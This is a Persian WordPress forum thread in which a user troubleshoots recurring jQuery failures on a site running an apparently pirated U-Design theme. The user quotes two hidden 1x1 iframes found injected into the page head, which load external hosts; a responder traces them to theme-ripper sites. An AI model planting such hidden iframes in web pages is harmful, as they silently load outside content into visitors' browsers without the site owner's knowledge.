رفتن به مطلب

از کار افتادن مداوم کتابخانه جی کوئری

پست های پیشنهاد شده

سلام. وقت همگی بخیر.

این که نوشتم از کار افتادن جی کوئری بخاطر از کارافتادن ابزارک ها ست. و همچنین حرکت نکردن اسلایدر سایت و خطا در آپلود عکس در آپلودر جدید وردپرس و گیرکردن در مرحله در حال متراکم کردن با افزونه برای آپلود عکس (که البته تو حالت دوم عکس آپلود میشه ولی روی همون گزینه می مونه). (سایت ـی که امضاء خودم هست را نمی گم)

اگر یکبار ورپرس را دوباره آپلود کنم، همگی درست میشه (بجز wp-contents خودتون می دونید دیگه!) اما بعد از مدتی (ساعت یا روزش را نمی دونم) دوباره از کار می افته.

بنظرتون مشکل از کجاست، به قالب مربوط میشه؟

"

پوسته U-Design (by blackhatboys.com) به‌همراه 11 ابزارک

شما از وردپرس 3.6-alpha استفاده می‌کنید.

اکیسمت

All in One SEO Pack

FlexyTalk - Free Live Chat Widget

Get The Image

WP-PageNavi

wp-jalali

"

لینک به ارسال

مشکلش به افزونه ای مربوط می شه که اون هم جی کوئری را فراخوانی می کنه در تداخل دو تا فراخوانی یا یک دستور تاگل دوبار اجرا می شه (که در واقع می شه خنثی) یا در اثر تداخل ورژن ها جی وئری کار نمی کنه

برای رفع مشکل باید از سایت در دو حالت مورد دار و سالم سورس کد گرفت و با هم مقایسه کرد و آدرس فراخوانی اضافی را از طریق افزونه اش حذف کرد

لینک به ارسال

مشکلش به افزونه ای مربوط می شه که اون هم جی کوئری را فراخوانی می کنه در تداخل دو تا فراخوانی یا یک دستور تاگل دوبار اجرا می شه (که در واقع می شه خنثی) یا در اثر تداخل ورژن ها جی وئری کار نمی کنه

برای رفع مشکل باید از سایت در دو حالت مورد دار و سالم سورس کد گرفت و با هم مقایسه کرد و آدرس فراخوانی اضافی را از طریق افزونه اش حذف کرد

استاد منظورتون از سورس همون page source هست؟

من در هر دو حالت سورس گرفتم و مقایسه کردم هیچ تفاوتی با هم نداشتند.

هر چند که دو جمله غیرمعمول توی سورس دیدم به نظرتون چیه؟ (البته تو هدر پیداش نکردم تا پاکش کنم ببینم مشکلی بوجود میاره یا نه- تو سورس قبل از بسته شدن تگ هد هست)

<iframe frameborder="0" height="1" marginheight="0" marginwidth="0"
scrolling="no" src="http://1star.biz/1s.php" width="1"></iframe>
<iframe frameborder="0" height="1" marginheight="0" marginwidth="0"
scrolling="no" src="http://www.cd.vg/8a3cdd" width="1"></iframe>

باز به نظرتون مشکل از چی میتونه باشه، چون توی لوکال هم دارم اما اونجا مشکلی نیست، راستی لوکال آخرین ورژن وردپرس نیست.

لینک به ارسال

پوسته ریپ هست؟ چون این آدرسها از سایتهای ریپر هست!

در مورد عدم کارکرد صحیح هم ممکنه نسخه جی کوئری وردپرس با یکی از اسکریپت های پوسته هماهنگ نباشه و باعث بروز مشکل بشه.

لینک به ارسال

بله...حالا از کجا تشخیص بدم که کدوم اسکریپ تداخل ایجاد میکنه؟

بنظرتون چرا توی لوکال این مشکل بوجود نمی اید؟

من هنوز تشخیص ندادم چی میشه یهو از کار می افته؟ چون یه مدت (یک ساعت، یک روز، 10 روز) سالمه بعد از کار می افته!

لینک به ارسال

پوسته ریپ همه مشکلاتی داره چون دزدی از اثر اصلی هست.

در هر صورت بحث پوسته های ریپ در انجمن ممنوع هست.

بهتره اگر به پوسته نیاز دارید اصلش رو تهیه کنید.

موفق باشید

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

• اضافه کردن...